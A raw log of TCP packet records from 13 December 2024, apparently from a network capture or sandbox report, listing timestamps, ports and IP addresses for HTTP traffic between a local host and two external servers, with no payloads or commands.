Dec 13, 2024 07:47:07.207778931 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.208425045 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.208477974 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.208483934 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.208534956 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.209336042 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.209371090 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.209409952 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.209434032 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.209867001 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.209901094 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.209949017 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.209949017 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.210484982 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.210532904 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.210618019 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.210666895 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.211386919 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.211452007 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.211884022 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.212246895 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.212296009 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.212342978 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.212347031 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.212436914 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.213053942 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.213175058 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.213226080 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.213226080 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.213900089 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.213975906 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.214020014 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.214431047 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.214730978 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.214870930 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.214934111 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.215329885 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.215580940 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.215708971 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.215714931 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.215959072 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.216438055 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.216578960 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.216589928 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.216630936 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.217286110 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.217344999 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.217400074 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.217538118 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.218126059 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.218229055 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.218256950 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.218307972 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.218952894 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.219026089 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.219074965 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.219141006 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.219789028 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.219899893 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.219913006 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.219971895 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.220674038 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.220798969 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.220877886 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.220877886 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.222501040 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.222692013 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.224035025 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.224095106 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.224508047 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.224541903 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.224577904 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.224611998 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.224622965 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.224622965 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.224622965 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.224647045 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.224669933 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.224683046 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.224710941 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.224730015 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.225384951 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.225526094 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.225574970 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.225634098 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.226295948 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.226331949 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.226597071 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.226597071 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.226999044 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.227302074 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.227344990 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.227411985 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.227857113 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.227955103 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.228033066 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.228207111 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.228777885 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.228923082 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.228965998 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.229032040 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.229537964 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.229707003 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.229712963 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.229882956 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.230360985 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.230532885 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.230571032 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.230624914 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.230818033 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.230942011 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.230964899 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.230999947 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.231693983 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.231762886 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.231792927 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.231914997 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.232549906 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.232630014 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.233011961 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.233011961 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.233314037 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.233381033 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.331804991 CET	49737	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:07.331913948 CET	49739	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:07.347100019 CET	49736	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.347330093 CET	49740	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.388907909 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.388998985 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.389182091 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.389245033 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.389245033 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.389306068 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.389363050 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.390053034 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.390125036 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.390196085 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.390300035 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.390841007 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.390896082 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.390966892 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.391026974 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.391726971 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.391782999 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.391922951 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.391980886 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.392520905 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.392652988 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.393122911 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.393372059 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.393428087 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.393487930 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.393558025 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.394211054 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.394315958 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.394356012 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.394411087 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.395051956 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.395162106 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.395183086 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.395256996 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.396003962 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.396224022 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.396231890 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.396560907 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.396763086 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.396878004 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.396975040 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.397605896 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.397705078 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.397743940 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.398452044 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.398525000 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.398581982 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.398610115 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.399283886 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.399334908 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.399334908 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.399409056 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.399950027 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.400175095 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.400321007 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.400373936 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.400373936 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.400990009 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.401127100 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.401207924 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.401864052 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.401925087 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.401974916 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.402090073 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.402708054 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.402806044 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.402822018 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.402906895 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.403577089 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.403711081 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.403728008 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.403801918 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.404377937 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.404505014 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.404557943 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.405477047 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.405539989 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.405703068 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.405874014 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.406074047 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.406167030 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.406213999 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.406281948 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.406936884 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.407031059 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.407145023 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.407232046 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.407748938 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.407803059 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.407882929 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.408603907 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.408705950 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.408759117 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.408759117 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.409459114 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.409569025 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.409610033 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.409662008 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.410290003 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.410358906 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.410408974 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.410470009 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.411132097 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.411226988 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.411269903 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.411323071 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.412008047 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.412111998 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.412158966 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.412846088 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.412900925 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.412975073 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.413234949 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.413674116 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.413749933 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.413813114 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.413870096 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.414532900 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.414632082 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.414654016 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.414782047 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.415373087 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.415426016 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.415498972 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.415565014 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.416208982 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.416261911 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.416328907 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.416397095 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.417056084 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.417196989 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.417743921 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.417897940 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.417948961 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.418028116 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.418102980 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.418726921 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.418831110 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.418869019 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.418932915 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.419614077 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.419698954 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.419735909 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.419863939 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.420452118 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.420556068 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.420923948 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.421355009 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.421391964 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.421438932 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.421438932 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.422154903 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.422230959 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.422271013 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.422369003 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.423008919 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.423150063 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.423157930 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.423327923 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.423861027 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.424020052 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.424164057 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.424665928 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.424746037 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.424806118 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.424866915 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.425600052 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.425709009 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.425765991 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.425846100 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.426373959 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.426434040 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.426507950 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.427390099 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.427424908 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.427468061 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.427468061 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.428472996 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.428507090 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.428669930 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.429135084 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.429167986 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.429186106 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.429217100 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.429815054 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.430006981 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.430181980 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.430619955 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.430761099 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.430808067 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.430865049 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.431576014 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.431612015 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.431663036 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.431663036 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.432318926 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.432476997 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.432527065 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.433233976 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.433330059 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.452784061 CET	80	49739	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:07.452816963 CET	80	49737	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:07.453155994 CET	49737	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:07.453155994 CET	49739	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:07.453156948 CET	49739	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:07.467588902 CET	80	49740	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.468673944 CET	49740	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.468719006 CET	80	49736	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.468822002 CET	49740	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.468898058 CET	49736	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.573353052 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.573406935 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.573447943 CET	80	49739	185.81.68.148	192.168.2.4
